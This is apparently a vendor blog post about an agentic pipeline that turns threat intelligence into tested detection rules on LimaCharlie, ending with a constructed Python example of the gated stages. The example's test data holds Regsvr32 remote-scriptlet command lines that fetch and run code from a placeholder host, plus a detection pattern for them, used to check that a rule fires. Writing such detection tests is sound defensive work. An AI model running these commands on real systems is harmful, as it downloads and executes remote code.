
Sr. Technical Content Strategist

Most AI detection engineering puts a human in the loop at every step. David Burkett envisions an efficient and effective pipeline architecture that does not.
David is a security researcher at Corelight Labs and a longtime LimaCharlie community member. He appeared on a recent episode of Defender Fridays to walk through his vision of a fully agentic detection engineering pipeline. His system uses LimaCharlie as its operational backbone.
For MSSPs trying to scale engineering capacity without scaling headcount, David’s approach is worth examining.
The core idea: instead of one AI model doing everything, you build a pipeline of specialist sub-agents. Each agent handles one discrete stage of the detection lifecycle. Validation gates sit between every stage.
The pipeline starts with a threat intelligence report. Agentic AI works through the report and identifies detection opportunities. A detection engineering agent writes rules and deploys them to LimaCharlie.
From there, LimaCharlie's built-in Atomic Red Team extension triggers activity on an endpoint to test whether the new rules fire. A monitoring agent watches the resulting alert volume. If a rule floods the queue with false positives, the agent can automatically disable the rule before it degrades analyst workflow.

What makes this more reliable than a single-agent approach is the gating. Each stage produces a concrete, verifiable output. The rule either deploys or it doesn't. The endpoint activity either triggers a detection or it doesn't. The false positive rate is measurable. Each step includes checks to reduce hallucination risk.
David also noted the importance of spawning validation sub-agents with isolated context for verification. A fresh AI instance, uncontaminated by the primary agent's reasoning, will catch mistakes the original agent may not.
Detection engineering is a high-friction process for security operations. Writing a rule from threat intel, testing it, and tuning false positives is time-intensive. For MSSPs managing coverage across hundreds of client environments, the friction compounds with every tenant and reported threat.
An agentic detection engineering pipeline compresses this cycle significantly. A threat intelligence report that once took hours to convert into tested, deployed detection logic now moves through the pipeline in a fraction of the time.
Every step of the process is logged and verifiable. For MSSPs, this means faster coverage for new threats across the entire client base, not just tenants with dedicated detection engineers.
Consistency is another advantage. An agentic pipeline applies the same logic and the same false positive criteria every time. That consistency is auditable, which matters for clients concerned with meeting specific regulatory requirements.
LimaCharlie enables the architecture
LimaCharlie was built as security infrastructure rather than a point product, which is what makes implementing agentic AI security architecture practical rather than theoretical.
The LimaCharlie API gives agents programmatic control over the full detection and response lifecycle. That includes detection and response (D&R) rule deployment, telemetry ingestion, alert monitoring, and other security operations.
Sub-agents can deploy a rule, observe its output in real time, and modify or retract it through the same API surface. No manual steps, no dashboard handoffs. Because LimaCharlie operates entirely via API, every AI agent action is transparent, governable and auditable.
LimaCharlie’s multi-tenant architecture enables MSSPs to run this pipeline once and propagate coverage across their entire client base. A threat intelligence report can become new client coverage in one pass.
David’s pipeline uses the Atomic Red Team integration to validate detections before production. This simulates the attack technique on a test endpoint and confirms the rule fires before it goes anywhere else. Automated validation separates David’s approach from pipelines that simply deploy rules and hope for the best.
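The pipeline described above (intel extraction, rule authoring, deployment, simulated-attack validation before production, and false-positive monitoring, with a verifiable gate after each stage and an isolated reviewer at the end), as an added example. This is not David Burkett's code and not LimaCharlie's SDK or D&R engine. Everything in it is constructed: DeployTarget stands in for the tenant API calls an agent would make, the evaluator handles only the three D&R-style operators the rule uses, the rule for T1218.010 is a fixed template standing in for the authoring agent, and the report, the simulated Regsvr32 record, the benign baseline and the held-out corpus are made-up inputs.

```python
"""Gated detection-engineering pipeline with specialist stages. Constructed
example for this article: not David Burkett's pipeline and not the LimaCharlie
SDK. DeployTarget stands in for the tenant API, the evaluator covers only the
D&R-style operators used below, and all reports and telemetry are constructed."""
import re

class GateFailed(Exception):
    """A stage produced output that failed its validation gate."""

def get_path(record, path):  # resolve 'event/FILE_PATH' against a two-level record
    top, key = path.split("/")
    return record.get(top, {}).get(key, "")

def matches(detect, record):
    """Evaluate a D&R-style detect block: event filter, 'and', 'ends with', 'matches'."""
    if detect.get("event") and get_path(record, "routing/event_type") != detect["event"]:
        return False
    if detect["op"] == "and":
        return all(matches(sub, record) for sub in detect["rules"])
    value = str(get_path(record, detect["path"]))
    if detect["op"] == "ends with":  # treated as case-insensitive here
        return value.lower().endswith(detect["value"].lower())
    if detect["op"] == "matches":
        return re.search(detect["re"], value) is not None
    raise ValueError(f"unsupported operator {detect['op']!r}")

class DeployTarget:
    """Stand-in for the tenant API an agent drives: deploy, observe, disable."""
    def __init__(self):
        self.rules, self.enabled, self.audit = {}, {}, []  # audit: every action taken
    def deploy(self, rule):
        self.rules[rule["name"]], self.enabled[rule["name"]] = rule, True
        self.audit.append(("deploy", rule["name"]))
        return rule["name"]
    def detections(self, name, records):
        if not self.enabled.get(name):
            return []
        return [r for r in records if matches(self.rules[name]["detect"], r)]
    def disable(self, name):
        self.enabled[name] = False
        self.audit.append(("disable", name))

def proc(path, cmd):  # constructed NEW_PROCESS record in routing/event layout
    return {"routing": {"event_type": "NEW_PROCESS"},
            "event": {"FILE_PATH": path, "COMMAND_LINE": cmd}}

# Stage 1, intel agent stand-in. Gate: the report must yield a technique ID.
def stage_extract(report):
    ids = sorted(set(re.findall(r"\bT\d{4}(?:\.\d{3})?\b", report)))
    if not ids:
        raise GateFailed("no detection opportunities found in report")
    return ids

# Stage 2, detection-engineering agent stand-in (a template lookup here).
# Gate: the rule must carry a response and must not fire on an empty record.
def stage_write_rule(technique):
    templates = {"T1218.010": {
        "name": "susp-regsvr32-remote-scriptlet",
        "detect": {"event": "NEW_PROCESS", "op": "and", "rules": [
            {"op": "ends with", "path": "event/FILE_PATH", "value": "regsvr32.exe"},
            {"op": "matches", "path": "event/COMMAND_LINE", "re": r"(?i)/i:https?://"}]},
        "respond": [{"action": "report", "name": "susp-regsvr32-remote-scriptlet"}]}}
    rule = templates.get(technique)
    if rule is None or not rule.get("respond") or matches(rule["detect"], {}):
        raise GateFailed(f"no usable rule produced for {technique}")
    return rule

# Stage 3, validation. Gate: the simulated technique must trigger the rule.
def stage_validate(target, name, simulated):
    hits = len(target.detections(name, simulated))
    if hits == 0:
        raise GateFailed(f"{name} did not fire on simulated activity")
    return hits

# Stage 4, monitoring agent stand-in: measure the false-positive rate over benign
# baseline traffic and disable the rule when it exceeds the budget.
def stage_monitor(target, name, baseline, max_fp):
    fp_rate = len(target.detections(name, baseline)) / max(len(baseline), 1)
    if fp_rate > max_fp:
        target.disable(name)
    return {"fp_rate": fp_rate, "enabled": target.enabled[name]}

# Isolated reviewer: sees only the rule and a held-out corpus that no earlier
# stage touched, and returns the command lines it objects to.
def independent_review(rule, holdout):
    return [r["event"]["COMMAND_LINE"] for r in holdout if matches(rule["detect"], r)]

def run_pipeline(report, target, simulated, baseline, holdout, max_fp=0.05):
    rule = stage_write_rule(stage_extract(report)[0])
    name = target.deploy(rule)
    stage_validate(target, name, simulated)
    status = stage_monitor(target, name, baseline, max_fp)
    return {"rule": name, "objections": independent_review(rule, holdout), **status}

# Constructed inputs: intel report, simulated-attack record, benign baseline, hold-out.
REPORT = "Actor abused Regsvr32 (T1218.010) to load a remote scriptlet via /i:http://."
SIMULATED = [proc(r"C:\Windows\System32\regsvr32.exe",
                  "regsvr32.exe /s /n /u /i:http://example.test/x.sct scrobj.dll")]
BASELINE = [proc(r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe /s C:\App\lib.dll"),
            proc(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs")]
HOLDOUT = [proc(r"C:\Windows\SysWOW64\regsvr32.exe", "regsvr32.exe /i:https://intranet.test/a.sct")]
```

Calling run_pipeline(REPORT, DeployTarget(), SIMULATED, BASELINE, HOLDOUT) deploys the rule, confirms it fires on the simulated record, measures a false-positive rate of zero over the baseline and leaves the rule enabled; the isolated reviewer, which only ever sees the held-out corpus, still returns the intranet scriptlet command line as an objection the earlier stages had no way to see. Deploying a broader rule that keys on the file path alone against the same baseline trips the monitor gate, and the disable action lands in the audit list alongside the deploy, which is the record an MSSP would review.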
Agentic detection engineering pipelines address an efficiency problem that has challenged MSSPs for years. They also represent just one application of agentic AI security, a technology with potential across the full spectrum of security operations.
To learn more about how LimaCharlie supports agentic SecOps workflows, visit limacharlie.io.